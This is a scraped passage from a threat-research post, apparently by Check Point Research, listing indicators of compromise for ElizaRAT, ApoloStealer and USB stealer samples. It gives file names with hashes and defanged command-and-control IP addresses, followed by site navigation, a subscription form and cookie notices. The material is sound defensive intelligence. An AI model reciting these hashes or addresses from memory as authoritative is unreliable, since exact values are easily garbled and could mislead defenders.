Circle.cplSHA1f7424286b6b5f8dbad86856ef178745e34c8e83aSHA2562b6a273eae0fb1835393aea6c30521d9bf5e27421c2933bfb3beee8c5b27847eMD5009cb6da5c4426403b82c79adf67021cApoloStealer
SlackFiles.dllSHA1f98019e637a2ae58d54ff903770b35eefb106432SHA256d66ba4ee97a2f42d85ca383f3f61a2fac4f0b374aad1337f5f29245242f2d990MD53a2c701408d94bbcdcf954793f6749bcApoloStealer
SpotifyAB.dllSHA10db24c0a4dd12e5fa412434222d81de8e2de4b3cSHA256dca78e069bfd9ca4638b4f9cb21dff721530d16924e502c03d8c9aa334b7ca0dMD51bac7ea5a9558d937eaf0682523e6a06ApoloStealer
Spotify-News.dllSHA1b7814d9f6f2096f5a9573ade52547a447eff33bbSHA256348c0980c61d7c682cce7521aaad13a20732f7115cb5559729b86ca255f1af7fMD5d3fe72a3b9cb5055662e6a0e19b8f010ApoloStealer
Spotify-Desk.dllSHA1c4c9aaeb74782cd9b5b8701d46e55cf299277215SHA2566f839ded49ebf1dad014d79fbab396e2067c487685556a8402f3acdeb1600d98MD5b54512bf0ed75a9f2dee26a4166461a2USB
Stealer
EmergencyBackup.dllSHA1b09d059e8d6b87f3a6165e4d71901187d0aa99d5SHA2560a52c0ac04251ac1a8bc193af47f33136ae502b0c237de5236d1136acc3b1140MD5ab127d76a40f1cb0cfd81ba1e786d983USB
Stealer
ConnectX.dllSHA1115e612a4e653cd915d5fc07246a00369fe38cdeSHA256b41e1d6340388b08694ae649a54fa09372f92f4038fd84259a06716fa706b967MD5b9d9e75a2e6b81277f2052a1f0b14e45ElizaRAT
Dropper
Award Verification to Air Cmde GS
Matharu.cplSHA11fc28b9e902dd2a8b771b1dc7ec3a62ad04fb02bSHA2566296fb22d94d1956fda2a6a48b36e37ddd15cf196c434ab409c787bf8aa47ac3MD558643299e340ae7b01efc67ef09ed369ElizaRAT
WordDocument.cplSHA1e5377172ee4bae1508405370ee41bee646837c04SHA256263f9e965f4f0d042537034e33699cf6d852fb8a52ac320a0e964ce96c48f5e5MD516ea7ce77c875a17049e9607323d1be4Persistence
tool
Aboutus.dllSHA10c9400e6b8c9244fd187a9f021d0da0b70b6f6fdSHA2568d552547fe045f6006f113527eb5dd4a8d5918c989bf11090c7cb44806d595beMD547990d1df44767ee3a6c4a6673ee76e9USB
Stealer
DonateUS.dllSHA143ac372b9cd05eefae3f50a0e487562759f3b0d9SHA256308c84c68c18af8458ae61afe1f2eec78f229e188724e271bd192a144fd582fcMD57ecaa3c5a647d671a9aa4369d4a43b83ElizaRAT
Dropper
Profile Verificition for Award.cpl
WordDocument.dllSHA1ee3162e649183490038da015e51750f23ae18d0fSHA256b9e10e83a270e1995acaceb88ce684fb97df6156a744565b20b6ec3bc08c2728MD5af2ec3dcfdbb7771b0a7a3d2035e7e99ElizaRAT
WordDocument.cplSHA12e8139275a48cd048c21e1942b673ae0781dd0b8SHA256b30a9e31b0897bfe6ab80aebcd0982eecf68e9d3d3353c1e146f72195cef0ef5
NETWORK
TypeValueDescriptionIP84.247.135[.]235C2 server – Google Drive
campaignIP143.110.179[.]176C2 server – Google Drive campaignIP64.227.134[.]248C2
server – Google Drive campaignIP38.54.84[.]83C2 server – Circle
campaignIP83.171.248[.]67C2 server – Slack campaign
GO UP
BACK TO ALL POSTS
POPULAR POSTS
* Artificial Intelligence
* ChatGPT
* Check Point Research Publications
OPWNAI : Cybercriminals Starting to Use ChatGPT
* Check Point Research Publications
* Threat Research
Hacking Fortnite Accounts
* Artificial Intelligence
* ChatGPT
* Check Point Research Publications
OpwnAI: AI That Can Save the Day or HACK it Away
BLOGS AND PUBLICATIONS
* Check Point Research Publications
August 11, 2017
“THE NEXT WANNACRY” VULNERABILITY IS HERE
* Check Point Research Publications
January 11, 2018
‘RUBYMINER’ CRYPTOMINER AFFECTS 30% OF WW NETWORKS
* Check Point Research Publications
* Global Cyber Attack Reports
* Threat Research
February 17, 2020
“THE TURKISH RAT” EVOLVED ADWIND IN A MASSIVE ONGOING PHISHING CAMPAIGN
* Check Point Research Publications
August 11, 2017
“THE NEXT WANNACRY” VULNERABILITY IS HERE
* Check Point Research Publications
January 11, 2018
‘RUBYMINER’ CRYPTOMINER AFFECTS 30% OF WW NETWORKS
* Check Point Research Publications
* Global Cyber Attack Reports
* Threat Research
February 17, 2020
“THE TURKISH RAT” EVOLVED ADWIND IN A MASSIVE ONGOING PHISHING CAMPAIGN
* Check Point Research Publications
August 11, 2017
“THE NEXT WANNACRY” VULNERABILITY IS HERE
* 1
* 2
* 3
* Publications
* Global cyber attack reports
* Research publications
* IPS advisories
* Check point blog
* Demos
* Tools
* Sandblast file analysis
* ThreatCloud
* Threat Intelligence
* Zero day protection
* Live threat map
* About Us
* Contact Us
LET’S GET IN TOUCH
Subscribe for cpr blogs, news and more
Subscribe Now
© 1994-2024 Check Point Software Technologies LTD. All rights reserved.
Property of CheckPoint.com
Privacy Policy
SUBSCRIBE TO CYBER INTELLIGENCE REPORTS
First Name
Last Name
Country—Please choose an option—ChinaIndiaUnited
StatesIndonesiaBrazilPakistanNigeriaBangladeshRussiaJapanMexicoPhilippinesVietnamEthiopiaEgyptGermanyIranTurkeyDemocratic
Republic of the CongoThailandFranceUnited KingdomItalyBurmaSouth AfricaSouth
KoreaColombiaSpainUkraineTanzaniaKenyaArgentinaAlgeriaPolandSudanUgandaCanadaIraqMoroccoPeruUzbekistanSaudi
ArabiaMalaysiaVenezuelaNepalAfghanistanYemenNorth
KoreaGhanaMozambiqueTaiwanAustraliaIvory CoastSyriaMadagascarAngolaCameroonSri
LankaRomaniaBurkina
FasoNigerKazakhstanNetherlandsChileMalawiEcuadorGuatemalaMaliCambodiaSenegalZambiaZimbabweChadSouth
SudanBelgiumCubaTunisiaGuineaGreecePortugalRwandaCzech
RepublicSomaliaHaitiBeninBurundiBoliviaHungarySwedenBelarusDominican
RepublicAzerbaijanHondurasAustriaUnited Arab
EmiratesIsraelSwitzerlandTajikistanBulgariaHong Kong (China)SerbiaPapua New
GuineaParaguayLaosJordanEl SalvadorEritreaLibyaTogoSierra
LeoneNicaraguaKyrgyzstanDenmarkFinlandSlovakiaSingaporeTurkmenistanNorwayLebanonCosta
RicaCentral African RepublicIrelandGeorgiaNew ZealandRepublic of the
CongoPalestineLiberiaCroatiaOmanBosnia and HerzegovinaPuerto
RicoKuwaitMoldovMauritaniaPanamaUruguayArmeniaLithuaniaAlbaniaMongoliaJamaicaNamibiaLesothoQatarMacedoniaSloveniaBotswanaLatviaGambiaKosovoGuinea-BissauGabonEquatorial
GuineaTrinidad and
TobagoEstoniaMauritiusSwazilandBahrainTimor-LesteDjiboutiCyprusFijiReunion
(France)GuyanaComorosBhutanMontenegroMacau (China)Solomon IslandsWestern
SaharaLuxembourgSurinameCape VerdeMaltaGuadeloupe (France)Martinique
(France)BruneiBahamasIcelandMaldivesBelizeBarbadosFrench Polynesia
(France)VanuatuNew Caledonia (France)French Guiana (France)Mayotte
(France)SamoaSao Tom and PrincipeSaint LuciaGuam (USA)Curacao (Netherlands)Saint
Vincent and the GrenadinesKiribatiUnited States Virgin Islands
(USA)GrenadaTongaAruba (Netherlands)Federated States of MicronesiaJersey
(UK)SeychellesAntigua and BarbudaIsle of Man (UK)AndorraDominicaBermuda
(UK)Guernsey (UK)Greenland (Denmark)Marshall IslandsAmerican Samoa (USA)Cayman
Islands (UK)Saint Kitts and NevisNorthern Mariana Islands (USA)Faroe Islands
(Denmark)Sint Maarten (Netherlands)Saint Martin (France)LiechtensteinMonacoSan
MarinoTurks and Caicos Islands (UK)Gibraltar (UK)British Virgin Islands
(UK)Aland Islands (Finland)Caribbean Netherlands (Netherlands)PalauCook Islands
(NZ)Anguilla (UK)Wallis and Futuna (France)TuvaluNauruSaint Barthelemy
(France)Saint Pierre and Miquelon (France)Montserrat (UK)Saint Helena, Ascension
and Tristan da Cunha (UK)Svalbard and Jan Mayen (Norway)Falkland Islands
(UK)Norfolk Island (Australia)Christmas Island (Australia)Niue (NZ)Tokelau
(NZ)Vatican CityCocos (Keeling) Islands (Australia)Pitcairn Islands (UK)
Email
WE VALUE YOUR PRIVACY!
BFSI uses cookies on this site. We use cookies to enable faster and easier
experience for you. By continuing to visit this website you agree to our use of
cookies.
ACCEPT
REJECT
This website uses cookies in order to optimize your user experience as well as
for advertising and analytics. For further information, please read our Privacy
Policy and ourCookie Notice.
DISMISS
Manage Preferences
404 Not Found
404 NOT FOUND
--------------------------------------------------------------------------------
nginx
When you visit any website, it may store or retrieve information on your
browser, mostly in the form of cookies. This information might be about you,
your preferences or your device and is mostly used to make the site work as you
expect it to. The information does not usually directly identify you, but it can
give you a more personalized web experience. Because we respect your right to
privacy, you can choose not to allow some types of cookies. Click on the
different category headings to find out more and change our default settings.
However, blocking some types of cookies may impact your experience of the site
and the services we are able to offer.
More information
Allow All
MANAGE CONSENT PREFERENCES
FUNCTIONAL COOKIES
Functional Cookies
These cookies enable the website to provide enhanced functionality and
personalisation. They may be set by us or by third party providers whose
services we have added to our pages. If you do not allow these cookies then some
or all of these services may not function properly.
STRICTLY NECESSARY COOKIES
Always Active
These cookies are necessary for the website to function and cannot be switched
off in our systems. They are usually only set in response to actions made by you
which amount to a request for services, such as setting your privacy
preferences, logging in or filling in forms. You can set your browser to block
or alert you about these cookies, but some parts of the site will not then work.
These cookies do not store any personally identifiable information.
PERFORMANCE COOKIES
Performance Cookies
These cookies allow us to count visits and traffic sources so we can measure and
improve the performance of our site. They help us to know which pages are the
most and least popular and see how visitors move around the site. All
information these cookies collect is aggregated and therefore anonymous. If you
do not allow these cookies we will not know when you have visited our site, and
will not be able to monitor its performance.
TARGETING COOKIES
Targeting Cookies
These cookies may be set through our site by our advertising partners. They may
be used by those companies to build a profile of your interests and show you
relevant adverts on other sites. They do not store directly personal
information, but are based on uniquely identifying your browser and internet
device. If you do not allow these cookies, you will experience less targeted
advertising.
Back Button
PERFORMANCE COOKIES
Search Icon
Filter Icon
Clear
checkbox label label
Apply Cancel
Consent Leg.Interest
checkbox label label
checkbox label label
checkbox label label
Reject All Confirm My Choices